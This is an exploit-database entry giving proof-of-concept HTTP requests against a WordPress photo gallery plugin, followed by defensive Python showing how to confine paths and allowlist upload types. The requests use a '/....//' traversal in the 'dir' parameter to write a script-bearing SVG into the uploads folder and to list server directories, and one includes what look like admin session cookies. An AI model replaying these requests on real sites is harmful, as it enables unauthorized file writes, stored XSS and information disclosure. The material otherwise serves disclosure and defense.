## https://sploitus.com/exploit?id=WPEX-ID:C8917BA2-4CB3-4B09-8A49-B7C612254946
- The request below writes the svg_to_xss.svg file into the /wp-content/uploads/ folder instead of the intended /wp-content/uploads/photo-gallery/ folder (the `dir` parameter traverses out of the gallery directory).
```http
POST /wordpress/wp-admin/admin-ajax.php?bwg_nonce=77c06f6311&action=bwg_upl&dir=/....//....//....// HTTP/1.1
Host: {host}
Content-Length: 2845
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysAMZOiWPOOk33DG8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Cookie: {cookie}

------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="bwg_nonce"

70ebb31e6c
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin-ajax.php?action=addImages&bwg_width=0&bwg_height=0&callback=bwg_add_image&bwg_nonce=b37a4be11b
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_thumb_width"

500
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_thumb_height"

500
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_img_width"

1200
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_img_height"

1200
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="task"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="extensions"

jpg,jpeg,png,gif,svg
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="callback"

bwg_add_image
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="sort_by"

date_modified
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="sort_order"

desc
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="items_view"

thumbs
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="dir"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_names"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_namesML"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_new_name"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="new_dir_name"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_task"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_files"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_src"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_dest"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="files[]"; filename="svg_to_xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<img src='1' onerror='alert()' />
</svg>
------WebKitFormBoundarysAMZOiWPOOk33DG8--
```
- The request below lists every folder and image file on the system, again by traversing out of the gallery directory through the `dir` parameter.
```http
POST /wordpress/wp-admin/admin-ajax.php?action=addImages&bwg_width=800&bwg_height=550&callback=bwg_add_preview_image&bwg_nonce=b37a4be11b& HTTP/1.1
Host: localhost
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7C7fee9203d7bfbbc77f90d0a9b9872d0ea8bf7b1ccfa9f43ced48936bbc98b05c; wordpress_test_cookie=WP%20Cookie%20check; pvc_visits[0]=1677949198b1; wp_lang=en_US; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7Cb76a29cd3f196f659d63ecb2bf9c7bb4d158aa0b03f274379bf45e4162030338; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1677909222; tk_ai=%2B8CRtWYwxLjZLIFmx4D5%2FaoH; redux_current_tab=settings; redux_current_tab_get=settings; redux_current_tab_wpml_settings=1; wordpress_apbct_antibot=0050792dac2aebc2f8264b54205dbd73de813c365ef1d1d92377c094cf3bc336; ct_paused_spam_check=0; apbct_check_comments_offset=200; ct_check_users__amount=100; ct_paused_users_check=0; apbct_check_users_offset=0

bwg_nonce=70ebb31e6c&dir=/....//....//....//....//....//....//
```
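As an added defensive illustration (not code from the plugin or from the PoC author) covering the `dir` traversal used in both requests and the client-supplied `extensions` list above: it assumes the plugin applied a single-pass `../` filter, which is what the `....//` sequence is shaped to bypass, and shows a confinement check that rejects the escape regardless of filtering. The install paths and the server-side allowlist are constructed for the example.

```python
import os

# Constructed paths for the illustration; the real install layout is not on the page.
UPLOADS = "/var/www/html/wp-content/uploads"
GALLERY = UPLOADS + "/photo-gallery"

# Server-side allowlist. The PoC submits "extensions=jpg,jpeg,png,gif,svg" in the
# request body; a client-supplied list must not be trusted, and SVG can carry script.
SAFE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def naive_clean(dir_param: str) -> str:
    """Hypothetical single-pass filter that removes '../' once.
    '....//' survives as '../' because the removal is not repeated, which is
    the shape of the dir parameter in both PoC requests."""
    return dir_param.replace("../", "")


def resolve_target(base: str, dir_param: str) -> str:
    """Lexically resolve the requested directory under base. normpath collapses
    '..'; on a live system use os.path.realpath so symlinks are resolved too."""
    return os.path.normpath(os.path.join(base, dir_param.lstrip("/")))


def is_confined(base: str, target: str) -> bool:
    """True only if target is base itself or lies strictly below it."""
    base = os.path.normpath(base)
    return target == base or target.startswith(base + os.sep)


def safe_gallery_path(dir_param: str):
    """Resolved directory, or None when the result escapes the gallery root.
    Literal '....' components are ordinary names and stay confined; only a real
    '..' that resolves above the root is rejected."""
    target = resolve_target(GALLERY, dir_param)
    return target if is_confined(GALLERY, target) else None


def upload_allowed(filename: str) -> bool:
    """Extension check against the server-side allowlist, not the request's."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in SAFE_EXTENSIONS


if __name__ == "__main__":
    payload = "/....//....//....//"
    print(naive_clean(payload))                           # /../../../
    print(resolve_target(GALLERY, naive_clean(payload)))  # /var/www/html
    print(safe_gallery_path(naive_clean(payload)))        # None
    print(upload_allowed("svg_to_xss.svg"))               # False
```

The confinement check must run on the final resolved path, after any normalisation the application performs, or a filter like `naive_clean` turns a harmless-looking value into a real traversal.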